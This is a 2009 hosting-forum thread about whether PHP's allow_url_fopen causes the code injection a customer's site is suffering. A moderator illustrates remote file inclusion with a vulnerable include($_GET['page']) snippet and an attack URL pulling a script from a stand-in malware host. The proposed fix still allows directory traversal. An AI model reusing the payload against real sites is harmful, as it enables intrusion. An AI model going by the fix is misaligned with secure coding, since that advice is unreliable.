|
|
 |
 |
|
 |
 |
Just lurking around? Why not join in? You could win free games just by chatting. Choose your Nickname in MyFreeola or Sign Up Here.
|
 |
|
Regular
on 15/07/2009 at 3:31:27PM
Total Posts: 237 |
I have read in various articles that, when enabled, this poses code injection security risks.
Is it possible to disable this on my webspace (I see it is currently 'on')?
Neil
|
|
|
|
|
|
|
|
LukeM
"Imperfection"
Staff
on 15/07/2009 at 4:42:07PM
Total Posts: 70
|
|
Chill Winstaaaan :D It is not that much of an issue to you, it is actually a security feature for server owners to protect themselves against users, such as you using fopen to grab external web pages and using them for malicious purposes. Just do not use fopen to reference external URLs and you will be doing the same as having allow_url_fopen turned off.
|
|
|
Neilj99
Regular
on 15/07/2009 at 9:36:33PM
Total Posts: 237
|
|
With respect to your knowledge, I'm not entirely convinced.
I direct you to this article
http://tutorials.ausweb.com.au/web/Tutorials/PHP-and-MySql/Security-issues---allow_url_fopen/
I have and am still experiencing iframe code injection attacks on my entire webspace, and am getting sick of it.
I believe if allow_url_fopen was disabled it would help me immensely.
I have read that I can include
allow_url_fopen=off
in a site level php.ini but I have tried this and it appears not to make any difference to my webspace.
N.
|
|
|
|
Eccles
"Aargh! Broken..."
Staff Moderator
Send a message
on 15/07/2009 at 9:47:11PM
Total Posts: 697
|
|
I will see whether we can have this feature disabled. It might inconvenience some customers who use it but they should be able to use cURL instead to achieve the same thing.
If you are seeing repeated injection attacks on your site then this suggests that you are accepting input that is not the sanitized. url_fopen is relatively safe if the people who write the code that makes use of it make sure they check any data it brings in. Not doing this is what causes problem and that is why it's generally considered a good idea to disable it.
|
|
|
Neilj99
Regular
on 15/07/2009 at 10:03:15PM
Total Posts: 237
|
|
Many thanks.
...would the 'custom' site level php.ini not work if I included it in my site root - to save others' inconvenience?
N.
|
|
|
ncrs
Staff
on 16/07/2009 at 1:51:56PM
Total Posts: 89
|
|
Neilj99 wrote:
> Many thanks.
>
> ...would the 'custom' site level php.ini not work if I included
> it in my site root - to save others' inconvenience?
>
> N.
We don't allow customers to overide PHP directives via their own php.ini files as this could allow customers who changed options to not just compromise their own webspaces but other customers on the same server. However it is probably possible to add a control panel option to allow certain safe options to be overidden on the same basis as the enable global vars option (another option which can allow security risks).
|
|
|
Neilj99
Regular
on 16/07/2009 at 1:56:07PM
Edited: 16/7/09 19:05 Total Posts: 237
|
|
Agreed.
I do hope you can invoke some kind of disabling of this. I believe it would greatly help.
I look forward to hearing any progress.
N.
|
|
|
Neilj99
Regular
on 21/07/2009 at 7:27:48PM
Total Posts: 237
|
|
@ Eccles
Any progress on disabling this yet?
N.
|
|
|
|
Eccles
"Aargh! Broken..."
Staff Moderator
Send a message
on 21/07/2009 at 8:01:22PM
Total Posts: 697
|
|
As other users of our VIP service use this functionality (for things such as pulling in RSS feeds among other uses) we are unable to disable this functionality.
I must stress that the idea of this being a security risk is down to the programmer using functions relying on this not validating content properly and not due to the feature being enabled.
If you understand PHP here is a simple example:
On a page somewhere:
<?php
.....
....
include($_GET['page']);
...
...
?>
This allows someone to include other remote content by dong something similar to this:
http://www.yoursite.com/index.php?page=http://dodgymalwaresite.com?dodgyscript.php?inject
A simple fix would be to move your content pages to their own folder and then modify the code to this:
<?php
.....
....
include('page_dir/'.$_GET['page']);
...
...
?>
Try the .htaccess rules you asked support about and that may clear up you problems although we can't really help if the rewrite rules cause problems.
|
|
|
Neilj99
Regular
on 21/07/2009 at 8:17:15PM
Total Posts: 237
|
|
Many thanks for your quick response.
N.
|
|
|
|
|
 |
|
|
